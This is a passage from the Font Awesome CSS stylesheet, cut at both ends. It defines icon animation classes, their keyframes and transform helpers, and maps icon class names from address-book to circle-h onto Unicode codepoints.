var(--fa-animation-delay, 0); animation-delay: var(--fa-animation-delay, 0); -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite); animation-iteration-count: var(--fa-animation-iteration-count, infinite); -webkit-animation-direction: var(--fa-animation-direction, normal); animation-direction: var(--fa-animation-direction, normal); } .fa-fade { -webkit-animation-name: fa-fade; animation-name: fa-fade; -webkit-animation-duration: var(--fa-animation-duration, 1s); animation-duration: var(--fa-animation-duration, 1s); -webkit-animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1)); animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1)); -webkit-animation-delay: var(--fa-animation-delay, 0); animation-delay: var(--fa-animation-delay, 0); -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite); animation-iteration-count: var(--fa-animation-iteration-count, infinite); -webkit-animation-direction: var(--fa-animation-direction, normal); animation-direction: var(--fa-animation-direction, normal); } .fa-beat-fade { -webkit-animation-name: fa-beat-fade; animation-name: fa-beat-fade; -webkit-animation-duration: var(--fa-animation-duration, 1s); animation-duration: var(--fa-animation-duration, 1s); -webkit-animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1)); animation-timing-function: var(--fa-animation-timing, cubic-bezier(0.4, 0, 0.6, 1)); -webkit-animation-delay: var(--fa-animation-delay, 0); animation-delay: var(--fa-animation-delay, 0); -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite); animation-iteration-count: var(--fa-animation-iteration-count, infinite); -webkit-animation-direction: var(--fa-animation-direction, normal); animation-direction: var(--fa-animation-direction, normal); } .fa-flip { -webkit-animation-name: fa-flip; animation-name: fa-flip; -webkit-animation-duration: var(--fa-animation-duration, 1s); animation-duration: var(--fa-animation-duration, 1s); -webkit-animation-timing-function: var(--fa-animation-timing, ease-in-out); animation-timing-function: var(--fa-animation-timing, ease-in-out); -webkit-animation-delay: var(--fa-animation-delay, 0); animation-delay: var(--fa-animation-delay, 0); -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite); animation-iteration-count: var(--fa-animation-iteration-count, infinite); -webkit-animation-direction: var(--fa-animation-direction, normal); animation-direction: var(--fa-animation-direction, normal); } .fa-shake { -webkit-animation-name: fa-shake; animation-name: fa-shake; -webkit-animation-duration: var(--fa-animation-duration, 1s); animation-duration: var(--fa-animation-duration, 1s); -webkit-animation-timing-function: var(--fa-animation-timing, linear); animation-timing-function: var(--fa-animation-timing, linear); -webkit-animation-delay: var(--fa-animation-delay, 0); animation-delay: var(--fa-animation-delay, 0); -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite); animation-iteration-count: var(--fa-animation-iteration-count, infinite); -webkit-animation-direction: var(--fa-animation-direction, normal); animation-direction: var(--fa-animation-direction, normal); } .fa-spin { -webkit-animation-name: fa-spin; animation-name: fa-spin; -webkit-animation-duration: var(--fa-animation-duration, 2s); animation-duration: var(--fa-animation-duration, 2s); -webkit-animation-timing-function: var(--fa-animation-timing, linear); animation-timing-function: var(--fa-animation-timing, linear); -webkit-animation-delay: var(--fa-animation-delay, 0); animation-delay: var(--fa-animation-delay, 0); -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite); animation-iteration-count: var(--fa-animation-iteration-count, infinite); -webkit-animation-direction: var(--fa-animation-direction, normal); animation-direction: var(--fa-animation-direction, normal); } .fa-spin-reverse { --fa-animation-direction: reverse; } .fa-pulse, .fa-spin-pulse { -webkit-animation-name: fa-spin; animation-name: fa-spin; -webkit-animation-duration: var(--fa-animation-duration, 1s); animation-duration: var(--fa-animation-duration, 1s); -webkit-animation-timing-function: var(--fa-animation-timing, steps(8)); animation-timing-function: var(--fa-animation-timing, steps(8)); -webkit-animation-iteration-count: var(--fa-animation-iteration-count, infinite); animation-iteration-count: var(--fa-animation-iteration-count, infinite); -webkit-animation-direction: var(--fa-animation-direction, normal); animation-direction: var(--fa-animation-direction, normal); } @media (prefers-reduced-motion: reduce) { .fa-beat, .fa-bounce, .fa-fade, .fa-beat-fade, .fa-flip, .fa-pulse, .fa-shake, .fa-spin, .fa-spin-pulse { transition-delay: 0s; transition-duration: 0s; -webkit-animation-duration: 1ms; animation-duration: 1ms; -webkit-animation-delay: -1ms; animation-delay: -1ms; -webkit-animation-iteration-count: 1; animation-iteration-count: 1; } } @-webkit-keyframes fa-beat { 0%, 90% { -webkit-transform: scale(1); transform: scale(1); } 45% { -webkit-transform: scale(var(--fa-beat-scale, 1.25)); transform: scale(var(--fa-beat-scale, 1.25)); } } @keyframes fa-beat { 0%, 90% { -webkit-transform: scale(1); transform: scale(1); } 45% { -webkit-transform: scale(var(--fa-beat-scale, 1.25)); transform: scale(var(--fa-beat-scale, 1.25)); } } @-webkit-keyframes fa-bounce { 0% { -webkit-transform: scale(1, 1) translateY(0); transform: scale(1, 1) translateY(0); } 10% { -webkit-transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0); transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0); } 30% { -webkit-transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em)); transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em)); } 50% { -webkit-transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0); transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0); } 57% { -webkit-transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em)); transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em)); } 64% { -webkit-transform: scale(1, 1) translateY(0); transform: scale(1, 1) translateY(0); } 100% { -webkit-transform: scale(1, 1) translateY(0); transform: scale(1, 1) translateY(0); } } @keyframes fa-bounce { 0% { -webkit-transform: scale(1, 1) translateY(0); transform: scale(1, 1) translateY(0); } 10% { -webkit-transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0); transform: scale(var(--fa-bounce-start-scale-x, 1.1), var(--fa-bounce-start-scale-y, 0.9)) translateY(0); } 30% { -webkit-transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em)); transform: scale(var(--fa-bounce-jump-scale-x, 0.9), var(--fa-bounce-jump-scale-y, 1.1)) translateY(var(--fa-bounce-height, -0.5em)); } 50% { -webkit-transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0); transform: scale(var(--fa-bounce-land-scale-x, 1.05), var(--fa-bounce-land-scale-y, 0.95)) translateY(0); } 57% { -webkit-transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em)); transform: scale(1, 1) translateY(var(--fa-bounce-rebound, -0.125em)); } 64% { -webkit-transform: scale(1, 1) translateY(0); transform: scale(1, 1) translateY(0); } 100% { -webkit-transform: scale(1, 1) translateY(0); transform: scale(1, 1) translateY(0); } } @-webkit-keyframes fa-fade { 50% { opacity: var(--fa-fade-opacity, 0.4); } } @keyframes fa-fade { 50% { opacity: var(--fa-fade-opacity, 0.4); } } @-webkit-keyframes fa-beat-fade { 0%, 100% { opacity: var(--fa-beat-fade-opacity, 0.4); -webkit-transform: scale(1); transform: scale(1); } 50% { opacity: 1; -webkit-transform: scale(var(--fa-beat-fade-scale, 1.125)); transform: scale(var(--fa-beat-fade-scale, 1.125)); } } @keyframes fa-beat-fade { 0%, 100% { opacity: var(--fa-beat-fade-opacity, 0.4); -webkit-transform: scale(1); transform: scale(1); } 50% { opacity: 1; -webkit-transform: scale(var(--fa-beat-fade-scale, 1.125)); transform: scale(var(--fa-beat-fade-scale, 1.125)); } } @-webkit-keyframes fa-flip { 50% { -webkit-transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg)); transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg)); } } @keyframes fa-flip { 50% { -webkit-transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg)); transform: rotate3d(var(--fa-flip-x, 0), var(--fa-flip-y, 1), var(--fa-flip-z, 0), var(--fa-flip-angle, -180deg)); } } @-webkit-keyframes fa-shake { 0% { -webkit-transform: rotate(-15deg); transform: rotate(-15deg); } 4% { -webkit-transform: rotate(15deg); transform: rotate(15deg); } 8%, 24% { -webkit-transform: rotate(-18deg); transform: rotate(-18deg); } 12%, 28% { -webkit-transform: rotate(18deg); transform: rotate(18deg); } 16% { -webkit-transform: rotate(-22deg); transform: rotate(-22deg); } 20% { -webkit-transform: rotate(22deg); transform: rotate(22deg); } 32% { -webkit-transform: rotate(-12deg); transform: rotate(-12deg); } 36% { -webkit-transform: rotate(12deg); transform: rotate(12deg); } 40%, 100% { -webkit-transform: rotate(0deg); transform: rotate(0deg); } } @keyframes fa-shake { 0% { -webkit-transform: rotate(-15deg); transform: rotate(-15deg); } 4% { -webkit-transform: rotate(15deg); transform: rotate(15deg); } 8%, 24% { -webkit-transform: rotate(-18deg); transform: rotate(-18deg); } 12%, 28% { -webkit-transform: rotate(18deg); transform: rotate(18deg); } 16% { -webkit-transform: rotate(-22deg); transform: rotate(-22deg); } 20% { -webkit-transform: rotate(22deg); transform: rotate(22deg); } 32% { -webkit-transform: rotate(-12deg); transform: rotate(-12deg); } 36% { -webkit-transform: rotate(12deg); transform: rotate(12deg); } 40%, 100% { -webkit-transform: rotate(0deg); transform: rotate(0deg); } } @-webkit-keyframes fa-spin { 0% { -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -webkit-transform: rotate(360deg); transform: rotate(360deg); } } @keyframes fa-spin { 0% { -webkit-transform: rotate(0deg); transform: rotate(0deg); } 100% { -webkit-transform: rotate(360deg); transform: rotate(360deg); } } .fa-rotate-90 { -webkit-transform: rotate(90deg); transform: rotate(90deg); } .fa-rotate-180 { -webkit-transform: rotate(180deg); transform: rotate(180deg); } .fa-rotate-270 { -webkit-transform: rotate(270deg); transform: rotate(270deg); } .fa-flip-horizontal { -webkit-transform: scale(-1, 1); transform: scale(-1, 1); } .fa-flip-vertical { -webkit-transform: scale(1, -1); transform: scale(1, -1); } .fa-flip-both, .fa-flip-horizontal.fa-flip-vertical { -webkit-transform: scale(-1, -1); transform: scale(-1, -1); } .fa-rotate-by { -webkit-transform: rotate(var(--fa-rotate-angle, none)); transform: rotate(var(--fa-rotate-angle, none)); } .fa-stack { line-height: 2em; position: relative; display: inline-block; width: 2.5em; height: 2em; vertical-align: middle; } .fa-stack-1x, .fa-stack-2x { position: absolute; z-index: var(--fa-stack-z-index, auto); left: 0; width: 100%; text-align: center; } .fa-stack-1x { line-height: inherit; } .fa-stack-2x { font-size: 2em; } .fa-inverse { color: var(--fa-inverse, #fff); } /* Font Awesome uses the Unicode Private Use Area (PUA) to ensure screen readers do not read off random characters that represent icons */ .fa-0::before { content: "\30"; } .fa-1::before { content: "\31"; } .fa-2::before { content: "\32"; } .fa-3::before { content: "\33"; } .fa-4::before { content: "\34"; } .fa-5::before { content: "\35"; } .fa-6::before { content: "\36"; } .fa-7::before { content: "\37"; } .fa-8::before { content: "\38"; } .fa-9::before { content: "\39"; } .fa-a::before { content: "\41"; } .fa-address-book::before { content: "\f2b9"; } .fa-contact-book::before { content: "\f2b9"; } .fa-address-card::before { content: "\f2bb"; } .fa-contact-card::before { content: "\f2bb"; } .fa-vcard::before { content: "\f2bb"; } .fa-align-center::before { content: "\f037"; } .fa-align-justify::before { content: "\f039"; } .fa-align-left::before { content: "\f036"; } .fa-align-right::before { content: "\f038"; } .fa-anchor::before { content: "\f13d"; } .fa-anchor-circle-check::before { content: "\e4aa"; } .fa-anchor-circle-exclamation::before { content: "\e4ab"; } .fa-anchor-circle-xmark::before { content: "\e4ac"; } .fa-anchor-lock::before { content: "\e4ad"; } .fa-angle-down::before { content: "\f107"; } .fa-angle-left::before { content: "\f104"; } .fa-angle-right::before { content: "\f105"; } .fa-angle-up::before { content: "\f106"; } .fa-angles-down::before { content: "\f103"; } .fa-angle-double-down::before { content: "\f103"; } .fa-angles-left::before { content: "\f100"; } .fa-angle-double-left::before { content: "\f100"; } .fa-angles-right::before { content: "\f101"; } .fa-angle-double-right::before { content: "\f101"; } .fa-angles-up::before { content: "\f102"; } .fa-angle-double-up::before { content: "\f102"; } .fa-ankh::before { content: "\f644"; } .fa-apple-whole::before { content: "\f5d1"; } .fa-apple-alt::before { content: "\f5d1"; } .fa-archway::before { content: "\f557"; } .fa-arrow-down::before { content: "\f063"; } .fa-arrow-down-1-9::before { content: "\f162"; } .fa-sort-numeric-asc::before { content: "\f162"; } .fa-sort-numeric-down::before { content: "\f162"; } .fa-arrow-down-9-1::before { content: "\f886"; } .fa-sort-numeric-desc::before { content: "\f886"; } .fa-sort-numeric-down-alt::before { content: "\f886"; } .fa-arrow-down-a-z::before { content: "\f15d"; } .fa-sort-alpha-asc::before { content: "\f15d"; } .fa-sort-alpha-down::before { content: "\f15d"; } .fa-arrow-down-long::before { content: "\f175"; } .fa-long-arrow-down::before { content: "\f175"; } .fa-arrow-down-short-wide::before { content: "\f884"; } .fa-sort-amount-desc::before { content: "\f884"; } .fa-sort-amount-down-alt::before { content: "\f884"; } .fa-arrow-down-up-across-line::before { content: "\e4af"; } .fa-arrow-down-up-lock::before { content: "\e4b0"; } .fa-arrow-down-wide-short::before { content: "\f160"; } .fa-sort-amount-asc::before { content: "\f160"; } .fa-sort-amount-down::before { content: "\f160"; } .fa-arrow-down-z-a::before { content: "\f881"; } .fa-sort-alpha-desc::before { content: "\f881"; } .fa-sort-alpha-down-alt::before { content: "\f881"; } .fa-arrow-left::before { content: "\f060"; } .fa-arrow-left-long::before { content: "\f177"; } .fa-long-arrow-left::before { content: "\f177"; } .fa-arrow-pointer::before { content: "\f245"; } .fa-mouse-pointer::before { content: "\f245"; } .fa-arrow-right::before { content: "\f061"; } .fa-arrow-right-arrow-left::before { content: "\f0ec"; } .fa-exchange::before { content: "\f0ec"; } .fa-arrow-right-from-bracket::before { content: "\f08b"; } .fa-sign-out::before { content: "\f08b"; } .fa-arrow-right-long::before { content: "\f178"; } .fa-long-arrow-right::before { content: "\f178"; } .fa-arrow-right-to-bracket::before { content: "\f090"; } .fa-sign-in::before { content: "\f090"; } .fa-arrow-right-to-city::before { content: "\e4b3"; } .fa-arrow-rotate-left::before { content: "\f0e2"; } .fa-arrow-left-rotate::before { content: "\f0e2"; } .fa-arrow-rotate-back::before { content: "\f0e2"; } .fa-arrow-rotate-backward::before { content: "\f0e2"; } .fa-undo::before { content: "\f0e2"; } .fa-arrow-rotate-right::before { content: "\f01e"; } .fa-arrow-right-rotate::before { content: "\f01e"; } .fa-arrow-rotate-forward::before { content: "\f01e"; } .fa-redo::before { content: "\f01e"; } .fa-arrow-trend-down::before { content: "\e097"; } .fa-arrow-trend-up::before { content: "\e098"; } .fa-arrow-turn-down::before { content: "\f149"; } .fa-level-down::before { content: "\f149"; } .fa-arrow-turn-up::before { content: "\f148"; } .fa-level-up::before { content: "\f148"; } .fa-arrow-up::before { content: "\f062"; } .fa-arrow-up-1-9::before { content: "\f163"; } .fa-sort-numeric-up::before { content: "\f163"; } .fa-arrow-up-9-1::before { content: "\f887"; } .fa-sort-numeric-up-alt::before { content: "\f887"; } .fa-arrow-up-a-z::before { content: "\f15e"; } .fa-sort-alpha-up::before { content: "\f15e"; } .fa-arrow-up-from-bracket::before { content: "\e09a"; } .fa-arrow-up-from-ground-water::before { content: "\e4b5"; } .fa-arrow-up-from-water-pump::before { content: "\e4b6"; } .fa-arrow-up-long::before { content: "\f176"; } .fa-long-arrow-up::before { content: "\f176"; } .fa-arrow-up-right-dots::before { content: "\e4b7"; } .fa-arrow-up-right-from-square::before { content: "\f08e"; } .fa-external-link::before { content: "\f08e"; } .fa-arrow-up-short-wide::before { content: "\f885"; } .fa-sort-amount-up-alt::before { content: "\f885"; } .fa-arrow-up-wide-short::before { content: "\f161"; } .fa-sort-amount-up::before { content: "\f161"; } .fa-arrow-up-z-a::before { content: "\f882"; } .fa-sort-alpha-up-alt::before { content: "\f882"; } .fa-arrows-down-to-line::before { content: "\e4b8"; } .fa-arrows-down-to-people::before { content: "\e4b9"; } .fa-arrows-left-right::before { content: "\f07e"; } .fa-arrows-h::before { content: "\f07e"; } .fa-arrows-left-right-to-line::before { content: "\e4ba"; } .fa-arrows-rotate::before { content: "\f021"; } .fa-refresh::before { content: "\f021"; } .fa-sync::before { content: "\f021"; } .fa-arrows-spin::before { content: "\e4bb"; } .fa-arrows-split-up-and-left::before { content: "\e4bc"; } .fa-arrows-to-circle::before { content: "\e4bd"; } .fa-arrows-to-dot::before { content: "\e4be"; } .fa-arrows-to-eye::before { content: "\e4bf"; } .fa-arrows-turn-right::before { content: "\e4c0"; } .fa-arrows-turn-to-dots::before { content: "\e4c1"; } .fa-arrows-up-down::before { content: "\f07d"; } .fa-arrows-v::before { content: "\f07d"; } .fa-arrows-up-down-left-right::before { content: "\f047"; } .fa-arrows::before { content: "\f047"; } .fa-arrows-up-to-line::before { content: "\e4c2"; } .fa-asterisk::before { content: "\2a"; } .fa-at::before { content: "\40"; } .fa-atom::before { content: "\f5d2"; } .fa-audio-description::before { content: "\f29e"; } .fa-austral-sign::before { content: "\e0a9"; } .fa-award::before { content: "\f559"; } .fa-b::before { content: "\42"; } .fa-baby::before { content: "\f77c"; } .fa-baby-carriage::before { content: "\f77d"; } .fa-carriage-baby::before { content: "\f77d"; } .fa-backward::before { content: "\f04a"; } .fa-backward-fast::before { content: "\f049"; } .fa-fast-backward::before { content: "\f049"; } .fa-backward-step::before { content: "\f048"; } .fa-step-backward::before { content: "\f048"; } .fa-bacon::before { content: "\f7e5"; } .fa-bacteria::before { content: "\e059"; } .fa-bacterium::before { content: "\e05a"; } .fa-bag-shopping::before { content: "\f290"; } .fa-shopping-bag::before { content: "\f290"; } .fa-bahai::before { content: "\f666"; } .fa-baht-sign::before { content: "\e0ac"; } .fa-ban::before { content: "\f05e"; } .fa-cancel::before { content: "\f05e"; } .fa-ban-smoking::before { content: "\f54d"; } .fa-smoking-ban::before { content: "\f54d"; } .fa-bandage::before { content: "\f462"; } .fa-band-aid::before { content: "\f462"; } .fa-barcode::before { content: "\f02a"; } .fa-bars::before { content: "\f0c9"; } .fa-navicon::before { content: "\f0c9"; } .fa-bars-progress::before { content: "\f828"; } .fa-tasks-alt::before { content: "\f828"; } .fa-bars-staggered::before { content: "\f550"; } .fa-reorder::before { content: "\f550"; } .fa-stream::before { content: "\f550"; } .fa-baseball::before { content: "\f433"; } .fa-baseball-ball::before { content: "\f433"; } .fa-baseball-bat-ball::before { content: "\f432"; } .fa-basket-shopping::before { content: "\f291"; } .fa-shopping-basket::before { content: "\f291"; } .fa-basketball::before { content: "\f434"; } .fa-basketball-ball::before { content: "\f434"; } .fa-bath::before { content: "\f2cd"; } .fa-bathtub::before { content: "\f2cd"; } .fa-battery-empty::before { content: "\f244"; } .fa-battery-0::before { content: "\f244"; } .fa-battery-full::before { content: "\f240"; } .fa-battery::before { content: "\f240"; } .fa-battery-5::before { content: "\f240"; } .fa-battery-half::before { content: "\f242"; } .fa-battery-3::before { content: "\f242"; } .fa-battery-quarter::before { content: "\f243"; } .fa-battery-2::before { content: "\f243"; } .fa-battery-three-quarters::before { content: "\f241"; } .fa-battery-4::before { content: "\f241"; } .fa-bed::before { content: "\f236"; } .fa-bed-pulse::before { content: "\f487"; } .fa-procedures::before { content: "\f487"; } .fa-beer-mug-empty::before { content: "\f0fc"; } .fa-beer::before { content: "\f0fc"; } .fa-bell::before { content: "\f0f3"; } .fa-bell-concierge::before { content: "\f562"; } .fa-concierge-bell::before { content: "\f562"; } .fa-bell-slash::before { content: "\f1f6"; } .fa-bezier-curve::before { content: "\f55b"; } .fa-bicycle::before { content: "\f206"; } .fa-binoculars::before { content: "\f1e5"; } .fa-biohazard::before { content: "\f780"; } .fa-bitcoin-sign::before { content: "\e0b4"; } .fa-blender::before { content: "\f517"; } .fa-blender-phone::before { content: "\f6b6"; } .fa-blog::before { content: "\f781"; } .fa-bold::before { content: "\f032"; } .fa-bolt::before { content: "\f0e7"; } .fa-zap::before { content: "\f0e7"; } .fa-bolt-lightning::before { content: "\e0b7"; } .fa-bomb::before { content: "\f1e2"; } .fa-bone::before { content: "\f5d7"; } .fa-bong::before { content: "\f55c"; } .fa-book::before { content: "\f02d"; } .fa-book-atlas::before { content: "\f558"; } .fa-atlas::before { content: "\f558"; } .fa-book-bible::before { content: "\f647"; } .fa-bible::before { content: "\f647"; } .fa-book-bookmark::before { content: "\e0bb"; } .fa-book-journal-whills::before { content: "\f66a"; } .fa-journal-whills::before { content: "\f66a"; } .fa-book-medical::before { content: "\f7e6"; } .fa-book-open::before { content: "\f518"; } .fa-book-open-reader::before { content: "\f5da"; } .fa-book-reader::before { content: "\f5da"; } .fa-book-quran::before { content: "\f687"; } .fa-quran::before { content: "\f687"; } .fa-book-skull::before { content: "\f6b7"; } .fa-book-dead::before { content: "\f6b7"; } .fa-bookmark::before { content: "\f02e"; } .fa-border-all::before { content: "\f84c"; } .fa-border-none::before { content: "\f850"; } .fa-border-top-left::before { content: "\f853"; } .fa-border-style::before { content: "\f853"; } .fa-bore-hole::before { content: "\e4c3"; } .fa-bottle-droplet::before { content: "\e4c4"; } .fa-bottle-water::before { content: "\e4c5"; } .fa-bowl-food::before { content: "\e4c6"; } .fa-bowl-rice::before { content: "\e2eb"; } .fa-bowling-ball::before { content: "\f436"; } .fa-box::before { content: "\f466"; } .fa-box-archive::before { content: "\f187"; } .fa-archive::before { content: "\f187"; } .fa-box-open::before { content: "\f49e"; } .fa-box-tissue::before { content: "\e05b"; } .fa-boxes-packing::before { content: "\e4c7"; } .fa-boxes-stacked::before { content: "\f468"; } .fa-boxes::before { content: "\f468"; } .fa-boxes-alt::before { content: "\f468"; } .fa-braille::before { content: "\f2a1"; } .fa-brain::before { content: "\f5dc"; } .fa-brazilian-real-sign::before { content: "\e46c"; } .fa-bread-slice::before { content: "\f7ec"; } .fa-bridge::before { content: "\e4c8"; } .fa-bridge-circle-check::before { content: "\e4c9"; } .fa-bridge-circle-exclamation::before { content: "\e4ca"; } .fa-bridge-circle-xmark::before { content: "\e4cb"; } .fa-bridge-lock::before { content: "\e4cc"; } .fa-bridge-water::before { content: "\e4ce"; } .fa-briefcase::before { content: "\f0b1"; } .fa-briefcase-medical::before { content: "\f469"; } .fa-broom::before { content: "\f51a"; } .fa-broom-ball::before { content: "\f458"; } .fa-quidditch::before { content: "\f458"; } .fa-quidditch-broom-ball::before { content: "\f458"; } .fa-brush::before { content: "\f55d"; } .fa-bucket::before { content: "\e4cf"; } .fa-bug::before { content: "\f188"; } .fa-bug-slash::before { content: "\e490"; } .fa-bugs::before { content: "\e4d0"; } .fa-building::before { content: "\f1ad"; } .fa-building-circle-arrow-right::before { content: "\e4d1"; } .fa-building-circle-check::before { content: "\e4d2"; } .fa-building-circle-exclamation::before { content: "\e4d3"; } .fa-building-circle-xmark::before { content: "\e4d4"; } .fa-building-columns::before { content: "\f19c"; } .fa-bank::before { content: "\f19c"; } .fa-institution::before { content: "\f19c"; } .fa-museum::before { content: "\f19c"; } .fa-university::before { content: "\f19c"; } .fa-building-flag::before { content: "\e4d5"; } .fa-building-lock::before { content: "\e4d6"; } .fa-building-ngo::before { content: "\e4d7"; } .fa-building-shield::before { content: "\e4d8"; } .fa-building-un::before { content: "\e4d9"; } .fa-building-user::before { content: "\e4da"; } .fa-building-wheat::before { content: "\e4db"; } .fa-bullhorn::before { content: "\f0a1"; } .fa-bullseye::before { content: "\f140"; } .fa-burger::before { content: "\f805"; } .fa-hamburger::before { content: "\f805"; } .fa-burst::before { content: "\e4dc"; } .fa-bus::before { content: "\f207"; } .fa-bus-simple::before { content: "\f55e"; } .fa-bus-alt::before { content: "\f55e"; } .fa-business-time::before { content: "\f64a"; } .fa-briefcase-clock::before { content: "\f64a"; } .fa-c::before { content: "\43"; } .fa-cake-candles::before { content: "\f1fd"; } .fa-birthday-cake::before { content: "\f1fd"; } .fa-cake::before { content: "\f1fd"; } .fa-calculator::before { content: "\f1ec"; } .fa-calendar::before { content: "\f133"; } .fa-calendar-check::before { content: "\f274"; } .fa-calendar-day::before { content: "\f783"; } .fa-calendar-days::before { content: "\f073"; } .fa-calendar-alt::before { content: "\f073"; } .fa-calendar-minus::before { content: "\f272"; } .fa-calendar-plus::before { content: "\f271"; } .fa-calendar-week::before { content: "\f784"; } .fa-calendar-xmark::before { content: "\f273"; } .fa-calendar-times::before { content: "\f273"; } .fa-camera::before { content: "\f030"; } .fa-camera-alt::before { content: "\f030"; } .fa-camera-retro::before { content: "\f083"; } .fa-camera-rotate::before { content: "\e0d8"; } .fa-campground::before { content: "\f6bb"; } .fa-candy-cane::before { content: "\f786"; } .fa-cannabis::before { content: "\f55f"; } .fa-capsules::before { content: "\f46b"; } .fa-car::before { content: "\f1b9"; } .fa-automobile::before { content: "\f1b9"; } .fa-car-battery::before { content: "\f5df"; } .fa-battery-car::before { content: "\f5df"; } .fa-car-burst::before { content: "\f5e1"; } .fa-car-crash::before { content: "\f5e1"; } .fa-car-on::before { content: "\e4dd"; } .fa-car-rear::before { content: "\f5de"; } .fa-car-alt::before { content: "\f5de"; } .fa-car-side::before { content: "\f5e4"; } .fa-car-tunnel::before { content: "\e4de"; } .fa-caravan::before { content: "\f8ff"; } .fa-caret-down::before { content: "\f0d7"; } .fa-caret-left::before { content: "\f0d9"; } .fa-caret-right::before { content: "\f0da"; } .fa-caret-up::before { content: "\f0d8"; } .fa-carrot::before { content: "\f787"; } .fa-cart-arrow-down::before { content: "\f218"; } .fa-cart-flatbed::before { content: "\f474"; } .fa-dolly-flatbed::before { content: "\f474"; } .fa-cart-flatbed-suitcase::before { content: "\f59d"; } .fa-luggage-cart::before { content: "\f59d"; } .fa-cart-plus::before { content: "\f217"; } .fa-cart-shopping::before { content: "\f07a"; } .fa-shopping-cart::before { content: "\f07a"; } .fa-cash-register::before { content: "\f788"; } .fa-cat::before { content: "\f6be"; } .fa-cedi-sign::before { content: "\e0df"; } .fa-cent-sign::before { content: "\e3f5"; } .fa-certificate::before { content: "\f0a3"; } .fa-chair::before { content: "\f6c0"; } .fa-chalkboard::before { content: "\f51b"; } .fa-blackboard::before { content: "\f51b"; } .fa-chalkboard-user::before { content: "\f51c"; } .fa-chalkboard-teacher::before { content: "\f51c"; } .fa-champagne-glasses::before { content: "\f79f"; } .fa-glass-cheers::before { content: "\f79f"; } .fa-charging-station::before { content: "\f5e7"; } .fa-chart-area::before { content: "\f1fe"; } .fa-area-chart::before { content: "\f1fe"; } .fa-chart-bar::before { content: "\f080"; } .fa-bar-chart::before { content: "\f080"; } .fa-chart-column::before { content: "\e0e3"; } .fa-chart-gantt::before { content: "\e0e4"; } .fa-chart-line::before { content: "\f201"; } .fa-line-chart::before { content: "\f201"; } .fa-chart-pie::before { content: "\f200"; } .fa-pie-chart::before { content: "\f200"; } .fa-chart-simple::before { content: "\e473"; } .fa-check::before { content: "\f00c"; } .fa-check-double::before { content: "\f560"; } .fa-check-to-slot::before { content: "\f772"; } .fa-vote-yea::before { content: "\f772"; } .fa-cheese::before { content: "\f7ef"; } .fa-chess::before { content: "\f439"; } .fa-chess-bishop::before { content: "\f43a"; } .fa-chess-board::before { content: "\f43c"; } .fa-chess-king::before { content: "\f43f"; } .fa-chess-knight::before { content: "\f441"; } .fa-chess-pawn::before { content: "\f443"; } .fa-chess-queen::before { content: "\f445"; } .fa-chess-rook::before { content: "\f447"; } .fa-chevron-down::before { content: "\f078"; } .fa-chevron-left::before { content: "\f053"; } .fa-chevron-right::before { content: "\f054"; } .fa-chevron-up::before { content: "\f077"; } .fa-child::before { content: "\f1ae"; } .fa-child-dress::before { content: "\e59c"; } .fa-child-reaching::before { content: "\e59d"; } .fa-child-rifle::before { content: "\e4e0"; } .fa-children::before { content: "\e4e1"; } .fa-church::before { content: "\f51d"; } .fa-circle::before { content: "\f111"; } .fa-circle-arrow-down::before { content: "\f0ab"; } .fa-arrow-circle-down::before { content: "\f0ab"; } .fa-circle-arrow-left::before { content: "\f0a8"; } .fa-arrow-circle-left::before { content: "\f0a8"; } .fa-circle-arrow-right::before { content: "\f0a9"; } .fa-arrow-circle-right::before { content: "\f0a9"; } .fa-circle-arrow-up::before { content: "\f0aa"; } .fa-arrow-circle-up::before { content: "\f0aa"; } .fa-circle-check::before { content: "\f058"; } .fa-check-circle::before { content: "\f058"; } .fa-circle-chevron-down::before { content: "\f13a"; } .fa-chevron-circle-down::before { content: "\f13a"; } .fa-circle-chevron-left::before { content: "\f137"; } .fa-chevron-circle-left::before { content: "\f137"; } .fa-circle-chevron-right::before { content: "\f138"; } .fa-chevron-circle-right::before { content: "\f138"; } .fa-circle-chevron-up::before { content: "\f139"; } .fa-chevron-circle-up::before { content: "\f139"; } .fa-circle-dollar-to-slot::before { content: "\f4b9"; } .fa-donate::before { content: "\f4b9"; } .fa-circle-dot::before { content: "\f192"; } .fa-dot-circle::before { content: "\f192"; } .fa-circle-down::before { content: "\f358"; } .fa-arrow-alt-circle-down::before { content: "\f358"; } .fa-circle-exclamation::before { content: "\f06a"; } .fa-exclamation-circle::before { content: "\f06a"; } .fa-circle-h::before { 